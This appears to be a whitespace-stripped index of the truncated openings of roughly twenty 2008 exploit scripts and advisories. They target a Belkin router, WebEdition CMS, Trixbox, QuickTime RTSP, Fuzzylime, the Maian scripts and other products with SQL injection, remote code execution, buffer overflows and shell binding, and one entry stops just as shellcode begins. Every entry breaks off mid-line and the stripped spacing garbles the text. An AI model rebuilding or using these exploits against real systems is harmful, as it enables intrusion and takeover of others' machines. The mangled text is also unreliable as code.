#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n";print"##################VIVAISLAMEVIVAISLAME#############
<html><head></head><body><b>htmlcodetobypassthewebinterfacepasswordprotectionoftheBelkinwirelessGrouteradsl2modem.<br>ItworkedonmodelF5D7632-4V6withupgraded
-----BEGINPGPSIGNEDMESSAGE-----Hash:SHA1~CoreSecurityTechnologies-CoreLabsAdvisory~http://www.coresecurity.com/corelabs/~AnzioWebPrintObjectBufferOverflow*AdvisoryInformation*Title:
-----BEGINPGPSIGNEDMESSAGE-----Hash:SHA1--OrangeBatadvisory-Name:VMWareWorkstation(hcmon.sys6.0.0.45731)Class:DoSPublished:2008-08-17Credit:g_(g_#orange-bat#com)--
<?phpini_set("max_execution_time",0);print_r('#################################################################WebEditionCMS-BlindSQLInjectionExploit#
#!/usr/bin/perl#k`sOSe08/17/2008#bypasssafesehusingflash9f.ocx.usewarnings;usestrict;useIO::Socket;#win32_exec-EXITFUNC=sehCMD=calcSize=160Encoder=PexFnstenvSubhttp://metasploit.commy$shellcode="
####################################################################################################################IpswitchWS_FTPHome/WS_FTPProfessionalFTPClientRemoteFormatStringvulnerability#Vendor:http://www.ipswitch.com
#!/usr/bin/perl#=================================================#BrewBlogger2.1.0.1ArbitraryAddAdminExploit#=================================================##,--^----------,--------,-----,-------^--,#||||||||||`-----
#NameOfScript:DolphinPHP#Version:6.1.2#DownloadFrom:http://heanet.dl.sourceforge.net/sourceforge/boonex-dolphin/Dolphin-v.6.1.2-Free.zip#FoundBy:RoMaNcYxHaCkEr[RoMaNTiC-TeaM]#MyHomePage:WwW.4RxH.CoM[
#!/usr/bin/perl-w#Jean-MichelBESNARD-LEXSIAudit#2008-07-08#perltrixbox_fi.pl192.168.1.212#Pleaselistencarefullyasourmenuoptionhaschanged#Choosefromthefollowingoptions:#1>RemoteTCPshell#
-[*]================================================================================[*]--[*]RealEstateScript<=1.1RemoteSQLInjectionVulnerability[*]--[*]==============================================================
#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;##[!]Discovered.:DNX#[!]Vendor.....:http://www.shooter-szene.de|http://www.ultrastats.org#[!]Detected...:29.06.2008#[!]Reported...:04.07.2008#[!]Re
#!/usr/bin/perl##quickbite.pl##SafariQuicktime<=7.3RTSPContent-Typeoverflowexploit#forMacOSX(Intel)##TestedwithOSX10.4.#Onvictim,browsetohttp://server:8080/#Bindsshellonport4444.
-[*]================================================================================[*]--[*]MaianUploader<=v4.0InsecureCookieHandlingVulnerability[*]--[*]======================================================
-[*]================================================================================[*]--[*]MaianSearch<=v1.1InsecureCookieHandlingVulnerability[*]--[*]======================================================
-[*]================================================================================[*]--[*]MaianWeblog<=v4.0InsecureCookieHandlingVulnerability[*]--[*]======================================================
-[*]================================================================================[*]--[*]MaianRecipe<=v1.2InsecureCookieHandlingVulnerability[*]--[*]======================================================
<?php####Name:Fuzzylime3.01RemoteCodeExecutionExploit##Credits:Charles"real"F.<charlesfol[at]hotmail.fr>####Conditions:None####Greetz:Inphex,hEEGyandausteN####Exp
====================================================================AvlcForum(vlc_forum.phpid)RemoteSQLInjectionVulnerability====================================================================,--^----------,--------,-----,
#!/usr/bin/perl#!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!#afterinoticedthattherewasaproblemchanging$cmd,ifixedit.thisistheresult.####Fuzzylime3.01RemoteCodeExecution##Credit